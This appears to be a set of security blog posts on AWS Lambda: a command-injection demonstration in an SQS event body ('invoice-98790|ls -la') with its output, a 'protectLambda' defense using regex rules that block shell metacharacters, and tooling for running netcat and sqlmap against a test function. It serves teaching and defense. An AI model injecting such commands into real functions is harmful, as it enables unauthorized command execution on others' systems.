We get "Debug" info, which is just for education/dummy purpose. The content from debug information (in this case, we got ASCII) suggests that some kind of command like "file" which is used to fetch type of the file-content is run.

Now, let’s inject the below message which is vulnerable to command injection. (It was covered in detail in the past blogs)

  "Records": [
      "body": "invoice-98790|ls -la",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      "messageAttributes": {}

In the above message, we injected the following: -

"body": "invoice-98790|ls -la",

We have piped the invoice filename with "ls –la" command. Let’s invoke the function (using the 'scanLambda' component): -

bliss$python3 -i -f protect -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 6e578940-b331-11e8-bf9a-836686cf50ac
    (-) Response ==>
    (-) "Invoice processing done! [Debug:total 6\ndrwxr-xr-x  4 root root  118 Sep  8 06:33 .\ndrwxr-xr-x 22 root root 4096 Sep  8 05:23 ..\n-rwxr-xr-x  1 root root   14 Sep  8 06:33 in_protect.cfg\n-rw-r--r--  1 root root  354 Sep  8 06:26\n-rw-rw-r--  1 root root    9 Sep  8 06:25 out_protect.cfg\ndrwxr-xr-x  2 root root   33 Aug 21 16:37 protectLambda\ndrwxrwxr-x  2 root root   36 Sep  8 05:55 tmp\n]"
    (-) Log ==>START RequestId: 6e578940-b331-11e8-bf9a-836686cf50ac Version: $LATEST
END RequestId: 6e578940-b331-11e8-bf9a-836686cf50ac
REPORT RequestId: 6e578940-b331-11e8-bf9a-836686cf50ac    Duration: 68.29 ms    Billed Duration: 100 ms     Memory Size: 128 MB    Max Memory Used: 22 MB

Hence, the command is being executed and we can see the following output: -

(-) "Invoice processing done! [Debug:total 6\ndrwxr-xr-x  4 root root  118 Sep  8 06:33 .\ndrwxr-xr-x 22 root root 4096 Sep  8 05:23 ..\n-rwxr-xr-x  1 root root   14 Sep  8 06:33 in_protect.cfg\n-rw-r--r--  1 root root  354 Sep  8 06:26\n-rw-rw-r--  1 root root    9 Sep  8 06:25 out_protect.cfg\ndrwxr-xr-x  2 root root   33 Aug 21 16:37 protectLambda\ndrwxrwxr-x  2 root root   36 Sep  8 05:55 tmp\n]"

Deploying 'protectLambda' against Command Injection:

Here, we have a potential command injection. Now, let’s secure it with 'protectLambda' utility. To achieve it, include 'protectLambda' as part of your project as shown below or as part of your package zip for AWS. There is no need to change the code as such.


Once it has been added, you can go ahead and add two lines to the lambda function as shown below: -

from protectLambda.protect import protect

def lambda_handler(event, context):

The added lines can be seen in the lambda function on AWS: -

Now, let’s add a rule for all incoming event streams. For example: - we can have this simple rule - .*[|;<>&%*#].* - which blocks a list of malicious characters listed between square brackets[ ]. For a successful command injection, one needs to leverage one of these characters. One can add any rule that fits the criteria to the "in_protect.txt" file.

Once loaded, it starts blocking malicious characters from the event stream. One can enter rules for specific to parameters as well. For example: - the below rule will search specifically in the "body" parameter which is sent in the message. In our case also, we are more interested in this parameter.


Once the rule is entered, we try to invoke the function with the same malicious payload as before: -

bliss$python3 -i -f protect -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 1affd2d8-b332-11e8-861c-89d1677e2525
    (-) Response ==>
    (-) "Security Violation..."
    (-) Log ==>START RequestId: 1affd2d8-b332-11e8-861c-89d1677e2525 Version: $LATEST
Input Rule violation for  .*[|;<>&%*#].*
END RequestId: 1affd2d8-b332-11e8-861c-89d1677e2525
REPORT RequestId: 1affd2d8-b332-11e8-861c-89d1677e2525    Duration: 0.98 ms    Billed Duration: 100 ms     Memory Size: 128 MB    Max Memory Used: 21 MB    

Bingo! As we can see, the event is blocked and could not touch the actual lambda function; it is being rejected before it gets into the function. We end up getting the following message: -

(-) "Security Violation..."

Also, if we look in the CloudWatch logs, we can see the following line: -

Input Rule violation for  .*[|;<>&%*#].*

It is important to have proper logging mechanisms in place. One can go ahead and setup a trigger with rules such that this message is sent, to the configured email address/phone number, immediately through email or SMS. One can quickly take action against IP address or setup more monitoring on the function if needed.

This is the way we can achieve "defense from inside". We can apply multiple rules as well and protect the function from various possible attack vectors.

Deploying 'protectLambda' for Outgoing Stream (Information Leakage):

As we leveraged the 'protectLambda' function to protect against incoming payloads, it can be used to protect the outgoing stream using the "out_protect.txt" file as shown below. It is equally important to protect the information going out through error messages, debug information or post exploitation harvesting.


Here, we just added a rule to block if "debug" information is sent in the outgoing stream. After adding the rule, we invoke the function as we did earlier: -

bliss$python3 -i -f protect -e ./events/event.txt

scanLambda - Lambda Scanner Script (beta)
(c) Blueinfy solutions pvt. ltd.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 8b9175cd-b333-11e8-ab42-e9c542af285d
    (-) Response ==>
    (-) "Security Violation..."
    (-) Log ==>START RequestId: 8b9175cd-b333-11e8-ab42-e9c542af285d Version: $LATEST
Output Rule violation for  .*debug.*
END RequestId: 8b9175cd-b333-11e8-ab42-e9c542af285d
REPORT RequestId: 8b9175cd-b333-11e8-ab42-e9c542af285d    Duration: 45.06 ms    Billed Duration: 100 ms     Memory Size: 128 MB    Max Memory Used: 21 MB    

Bingo! We can see the following message: -

(-) "Security Violation..."

If we go and check the CloudWatch logs then we can find the following line as well: -

Output Rule violation for  .*debug.*

Hence, this way the outgoing stream is also protected by the utility.


The nature of lambda functions is such that various sets of payloads can be injected by manipulating the event streams. As it is not necessary that the lambda functions would always be triggered by an API gateway though HTTP(s), it would not be possible to deploy traditional defense solutions for lambda functions. Thus, the use case scenario of the lambda functions makes it imperative to use strong defense techniques from "inside" for incoming as well as outgoing streams. As the first line of defense, 'protectLambda' can guard both incoming as well as outgoing streams through a set of predefined rules. This is also a practical solution from its model perspective, as having a protection where every request makes a call over a network and gets validated at a central place would break the whole idea or model of serverless functions. Thus, defense techniques integrated with the lambda function itself along with proper logging mechanisms seems to be a correct approach. This way, we can achieve lambda function's runtime protection by providing self-defense from inside, independent from any other system/application/program/services.

Article by Amish Shah and Shreeraj Shah

Leveraging tunnelLambda with pentesting tools for serverless function testing

One of the challenges for lambda function testing is to incorporating and integrating traditional effective tools like netcat, burp proxy or sqlmap. These tools runs on HTTP(S) pipes while lambda function's events can be coming from any where without HTTP pipe. Hence, one can leverage tool like tunnelLambda while performing pentesting. It is part of our scanLambda toolkit (Here -

It is very simple as shown below. It establishes tunnel between your target lambda function and your specific tool on localhost/port.

'tunnelLambda' helps in establishing a tunnel from your shell to a targeted lambda function. It helps in sending HTTP traffic to the selected port, which will automatically tunnel to the test function. Hence, now we can use some standard HTTP tools like netcat, sqlmap, Burp or ZAP to test the lambda function.

Once it is set, the script will listen on the target port for both GET and POST requests as shown below: -

When you make a GET request it will serve a simple HTML page which can be used to interact with the lambda function as shown in the below figure. We can just open the page in a browser, put the event stream and click on "Send" button. It will show the output once it is invoked.

Also, now we can use tools like netcat, burp, sqlmap or any other tool to make a POST request directly. Here is our HTTP request,

$ cat sqltest.txt
Host: localhost:8888
Content-Length: 17


We can push it to netcat,

$ cat sqltest.txt | nc localhost 8888
HTTP/1.0 200 OK
Server: BaseHTTP/0.6 Python/3.6.4
Date: Fri, 07 Sep 2018 03:04:41 GMT
Content-type: application/json

{"id": "1239873"}

We can start running sqlmap as well.

$ python -r ../sqltest.txt
 ___ ___[.]_____ ___ ___  {}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:37:00

[08:37:00] [INFO] parsing HTTP request from '../sqltest.txt'
JSON data found in POST data. Do you want to process it? [Y/n/q] Y
[08:37:05] [INFO] testing connection to the target URL
[08:37:07] [INFO] testing if the target URL content is stable
[08:37:09] [INFO] target URL content is stable
[08:37:09] [INFO] testing if (custom) POST parameter 'JSON name' is dynamic

We need to configure the details in Burp repeater as shown below:


Once it is set, we can make the call as shown below:


Next, we can simply send the request to intruder and run attacks as shown below:

Hence, this allows us to quickly leverage all popular tools against lambda functions.

Article by Hemil Shah

lambdaScanner - Scan and Secure serverless lambda functions

'lambdaScanner' is a toolkit which has a combination of scripts for performing penetration testing of lambda functions. The scripts available in the toolkit help assessing the lambda functions from a security standpoint. It helps the tester to discover vulnerabilities in deployment as well as code. It aids in checking vulnerabilities like improper permissions, SQL injections, command executions etc. to name a few. This is not an automated scanner, but a toolkit that helps pen-testers to perform the testing of functions, so it needs to be used wisely by crafting customized requests and payloads. The lambda functions are invoked through various events encompassing AWS like S3, DynamoDB, SQS etc. so the scripts in the toolkit are very helpful in evaluating functions as well as directly testing with various sets of payloads. All these scripts are written in python by using boto3 APIs. The toolkit also has a package called 'lambdaProtect' which can be integrated with an existing lambda function to guard both incoming event stream as well as outgoing response.

This toolkit is "in progress/prototype" and would be enhanced with time by an addition of various functionalities.

Here is a diagram, which describes 'lambdaScanner': -


For more detail please visit - here